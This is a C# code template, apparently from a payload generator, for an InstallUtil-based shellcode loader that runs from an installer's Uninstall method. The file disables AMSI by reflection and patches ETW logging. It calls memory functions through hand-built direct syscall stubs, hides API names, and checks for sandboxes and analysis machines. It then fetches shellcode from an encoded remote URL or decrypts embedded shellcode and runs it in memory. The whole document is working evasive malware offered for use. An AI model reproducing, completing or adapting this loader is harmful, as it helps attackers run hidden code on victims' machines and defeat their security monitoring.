using System;
using System.ComponentModel;
using System.Configuration.Install;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;

namespace {{ v.namespace }} {

    [RunInstaller(true)]
    public class {{ v.class_name }} : Installer {

        // Dynamic NtDll delegates - no DllImport strings in assembly metadata
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        private delegate int NtAllocFn(IntPtr ph, ref IntPtr ba, IntPtr zb, ref IntPtr rs, uint at, uint prot);
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        private delegate int NtProtFn(IntPtr ph, ref IntPtr ba, ref IntPtr sz, uint np, out uint op);

        static string B(int[] c) {
            var sb = new System.Text.StringBuilder();
            foreach (var x in c) sb.Append((char)x);
            return sb.ToString();
        }

        static byte[] N(int[] c) { var b=new byte[c.Length+1]; for(int i=0;i<c.Length;i++) b[i]=(byte)c[i]; return b; }

        static IntPtr {{ v.fn_syscall }}(int ssn) {
            IntPtr p = Marshal.AllocHGlobal(12);
            Marshal.WriteByte(p,  0, 0x4C);
            Marshal.WriteByte(p,  1, 0x8B);
            Marshal.WriteByte(p,  2, 0xD1);
            Marshal.WriteByte(p,  3, 0xB8);
            Marshal.WriteByte(p,  4, (byte)(ssn & 0xFF));
            Marshal.WriteByte(p,  5, (byte)((ssn >> 8) & 0xFF));
            Marshal.WriteByte(p,  6, 0);
            Marshal.WriteByte(p,  7, 0);
            Marshal.WriteByte(p,  8, 0x0F);
            Marshal.WriteByte(p,  9, 0x05);
            Marshal.WriteByte(p, 10, 0xC3);
            return p;
        }

        static int {{ v.fn_extract_ssn }}(IntPtr fnAddr) {
            if (Marshal.ReadByte(fnAddr, 0) != 0x4C) return -1;
            if (Marshal.ReadByte(fnAddr, 1) != 0x8B) return -1;
            if (Marshal.ReadByte(fnAddr, 2) != 0xD1) return -1;
            if (Marshal.ReadByte(fnAddr, 3) != 0xB8) return -1;
            return Marshal.ReadByte(fnAddr, 4) | (Marshal.ReadByte(fnAddr, 5) << 8);
        }

        // Walk PE export table by name bytes - no plaintext function name strings.
        static IntPtr {{ v.fn_getexport }}(IntPtr mod, byte[] name) {
            try {
                int peo    = Marshal.ReadInt32(mod, 0x3C);
                int exprva = Marshal.ReadInt32(IntPtr.Add(mod, peo + 0x88));
                if (exprva == 0) return IntPtr.Zero;
                IntPtr ed  = IntPtr.Add(mod, exprva);
                int nn   = Marshal.ReadInt32(ed, 0x18);
                int nrva = Marshal.ReadInt32(ed, 0x20);
                int orva = Marshal.ReadInt32(ed, 0x24);
                int frva = Marshal.ReadInt32(ed, 0x1C);
                for (int i = 0; i < nn; i++) {
                    IntPtr np = IntPtr.Add(mod, Marshal.ReadInt32(IntPtr.Add(mod, nrva + i*4)));
                    bool ok = true;
                    for (int j = 0; j < name.Length; j++)
                        if (Marshal.ReadByte(IntPtr.Add(np, j)) != name[j]) { ok = false; break; }
                    if (!ok) continue;
                    short ord = Marshal.ReadInt16(IntPtr.Add(mod, orva + i*2));
                    return IntPtr.Add(mod, Marshal.ReadInt32(IntPtr.Add(mod, frva + ord*4)));
                }
            } catch {}
            return IntPtr.Zero;
        }

        static void {{ v.fn_amsi }}() {
            try {
                var t = Type.GetType(B(new int[]{ {{ v.jsc_auto_amsi_utils }} }));
                if (t != null) {
                    var f = t.GetField(B(new int[]{ {{ v.jsc_amsi_init_fail }} }),
                        BindingFlags.NonPublic | BindingFlags.Static);
                    if (f != null) f.SetValue(null, true);
                }
            } catch {}
        }

        static void {{ v.fn_etw }}(IntPtr ntdll, NtProtFn NtProt) {
            try {
                byte[] tgt = N(new int[]{ {{ v.jsc_etw_event_write }} });
                IntPtr fn  = {{ v.fn_getexport }}(ntdll, tgt);
                if (fn == IntPtr.Zero) return;
                IntPtr ph = (IntPtr)(-1);
                IntPtr ba = fn; IntPtr sz = (IntPtr)3; uint old;
                NtProt(ph, ref ba, ref sz, 0x40, out old);
                Marshal.WriteByte(fn, 0, 0x33);
                Marshal.WriteByte(fn, 1, 0xC0);
                Marshal.WriteByte(fn, 2, 0xC3);
                IntPtr ba2 = fn; IntPtr sz2 = (IntPtr)3;
                NtProt(ph, ref ba2, ref sz2, old, out old);
            } catch {}
        }

        static bool {{ v.fn_sandbox }}() {
            try {
                string u = Environment.UserName.ToLower();
                string[] badU = new string[]{B(new int[]{115,97,110,100,98,111,120}),B(new int[]{109,97,108,116,101,115,116}),B(new int[]{118,105,114,117,115}),B(new int[]{99,117,99,107,111,111}),B(new int[]{117,115,101,114}),B(new int[]{116,101,115,116})};
                foreach (var b in badU) if (u == b) return true;
                var di = new System.IO.DriveInfo("C");
                if (di.TotalSize < 53687091200L) return true;
                string cn = Environment.MachineName.ToLower();
                if (cn.Contains(B(new int[]{115,97,110,100,98,111,120}))) return true;
                if (cn.Contains(B(new int[]{97,110,97,108,121,115,105,115}))) return true;
                if (Environment.GetEnvironmentVariable(B(new int[]{ {{ v.jsc_env_vbox }} })) != null) return true;
                if (Environment.GetEnvironmentVariable(B(new int[]{ {{ v.jsc_env_sandboxie }} })) != null) return true;
            } catch {}
            return false;
        }

        static byte[] {{ v.fn_hex }}(string h) {
            var b = new byte[h.Length / 2];
            for (int i = 0; i < b.Length; i++)
                b[i] = Convert.ToByte(h.Substring(i * 2, 2), 16);
            return b;
        }

        static byte[] {{ v.fn_xor }}(byte[] d, byte[] k) {
            var o = new byte[d.Length];
            for (int i = 0; i < d.Length; i++) o[i] = (byte)(d[i] ^ k[i % k.Length]);
            return o;
        }

        public override void Uninstall(System.Collections.IDictionary state) {
            if ({{ v.fn_sandbox }}()) return;

            // Resolve ntdll from loaded modules (no GetModuleHandle string in IAT)
            IntPtr ntdll = IntPtr.Zero;
            foreach (System.Diagnostics.ProcessModule m in
                     System.Diagnostics.Process.GetCurrentProcess().Modules)
                if (m.ModuleName.ToLower() == B(new int[]{ {{ v.jsc_ntdll_dll }} })) {
                    ntdll = m.BaseAddress; break;
                }
            if (ntdll == IntPtr.Zero) return;

            byte[] allocN = N(new int[]{ {{ v.jsc_nt_alloc_vm }} });
            byte[] protN  = N(new int[]{ {{ v.jsc_nt_prot_vm }} });
            IntPtr allocAddr = {{ v.fn_getexport }}(ntdll, allocN);
            int allocSsn = {{ v.fn_extract_ssn }}(allocAddr);
            if (allocSsn >= 0) allocAddr = {{ v.fn_syscall }}(allocSsn);
            IntPtr protAddr  = {{ v.fn_getexport }}(ntdll, protN);
            int protSsn = {{ v.fn_extract_ssn }}(protAddr);
            if (protSsn >= 0) protAddr = {{ v.fn_syscall }}(protSsn);
            if (allocAddr == IntPtr.Zero || protAddr == IntPtr.Zero) return;

            var NtAlloc = (NtAllocFn)Marshal.GetDelegateForFunctionPointer(allocAddr, typeof(NtAllocFn));
            var NtProt  = (NtProtFn )Marshal.GetDelegateForFunctionPointer(protAddr,  typeof(NtProtFn));

            {{ v.fn_amsi }}();
            {{ v.fn_etw }}(ntdll, NtProt);
            Thread.Sleep(2000 + new Random().Next(3000));

            {%- if is_staged %}
            byte[] {{ sg.sg_lv_url }} = new byte[]{ {% for b in staged_url_enc %}{{ b }},{% endfor %} };
            for (int {{ sg.sg_lv_i }} = 0; {{ sg.sg_lv_i }} < {{ sg.sg_lv_url }}.Length; {{ sg.sg_lv_i }}++) {{ sg.sg_lv_url }}[{{ sg.sg_lv_i }}] ^= (byte){{ staged_url_xk }};
            byte[] {{ sg.sg_lv_jwt }} = new byte[]{ {% for b in staged_jwt_enc %}{{ b }},{% endfor %} };
            for (int {{ sg.sg_lv_i }} = 0; {{ sg.sg_lv_i }} < {{ sg.sg_lv_jwt }}.Length; {{ sg.sg_lv_i }}++) {{ sg.sg_lv_jwt }}[{{ sg.sg_lv_i }}] ^= (byte){{ staged_jwt_xk }};
            byte[] {{ sg.sg_lv_ua }} = new byte[]{ {% for b in staged_ua_enc %}{{ b }},{% endfor %} };
            for (int {{ sg.sg_lv_i }} = 0; {{ sg.sg_lv_i }} < {{ sg.sg_lv_ua }}.Length; {{ sg.sg_lv_i }}++) {{ sg.sg_lv_ua }}[{{ sg.sg_lv_i }}] ^= (byte){{ staged_ua_xk }};
            byte[] sc;
            try {
                System.Net.ServicePointManager.ServerCertificateValidationCallback = (a,b,c,d) => true;
                System.Net.ServicePointManager.SecurityProtocol =
                    (System.Net.SecurityProtocolType)3072 | (System.Net.SecurityProtocolType)768;
                var {{ sg.sg_lv_req }} = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(
                    System.Text.Encoding.ASCII.GetString({{ sg.sg_lv_url }}));
                {{ sg.sg_lv_req }}.Method = "GET";
                {{ sg.sg_lv_req }}.UserAgent = System.Text.Encoding.ASCII.GetString({{ sg.sg_lv_ua }});
                {{ sg.sg_lv_req }}.Headers["Authorization"] = "Bearer " + System.Text.Encoding.ASCII.GetString({{ sg.sg_lv_jwt }});
                using (var {{ sg.sg_lv_resp }} = ({{ sg.sg_lv_req }}.GetResponse() as System.Net.HttpWebResponse))
                using (var {{ sg.sg_lv_buf }} = new System.IO.MemoryStream()) {
                    if ((int){{ sg.sg_lv_resp }}.StatusCode != 200) return;
                    {{ sg.sg_lv_resp }}.GetResponseStream().CopyTo({{ sg.sg_lv_buf }});
                    sc = {{ sg.sg_lv_buf }}.ToArray();
                }
            } catch { return; }
            for (int {{ sg.sg_lv_i }} = 0; {{ sg.sg_lv_i }} < {{ sg.sg_lv_jwt }}.Length; {{ sg.sg_lv_i }}++) {{ sg.sg_lv_jwt }}[{{ sg.sg_lv_i }}] = 0;
            {%- else %}
            byte[] _k = {{ v.fn_hex }}({% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %});
            for (int _ki = 0; _ki < _k.Length; _ki++) _k[_ki] ^= (byte){{ key_tweak }};
            byte[] sc = {{ v.fn_xor }}({{ v.fn_hex }}({% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %}), _k);
            {%- if is_compressed %}
            // Decompress: server pre-deflated the raw shellcode before XOR
            // so static signatures over the cleartext payload are defeated.
            using (var _csm = new System.IO.MemoryStream(sc))
            using (var _ds  = new System.IO.Compression.DeflateStream(_csm,
                                  System.IO.Compression.CompressionMode.Decompress))
            using (var _dsm = new System.IO.MemoryStream()) {
                _ds.CopyTo(_dsm);
                sc = _dsm.ToArray();
            }
            {%- endif %}
            {%- endif %}

            IntPtr ph  = (IntPtr)(-1);
            IntPtr mem = IntPtr.Zero;
            IntPtr rsz = (IntPtr)sc.Length;
            if (NtAlloc(ph, ref mem, IntPtr.Zero, ref rsz, 0x3000, 0x04) != 0 || mem == IntPtr.Zero) return;
            Marshal.Copy(sc, 0, mem, sc.Length);
            IntPtr psz = (IntPtr)sc.Length;
            uint oldProt;
            NtProt(ph, ref mem, ref psz, 0x20, out oldProt);

            var fn_thread = new Thread(() => {
                var fn = (Action)Marshal.GetDelegateForFunctionPointer(mem, typeof(Action));
                fn();
            });
            fn_thread.IsBackground = true;
            fn_thread.Start();
            fn_thread.Join();
        }
    }
}
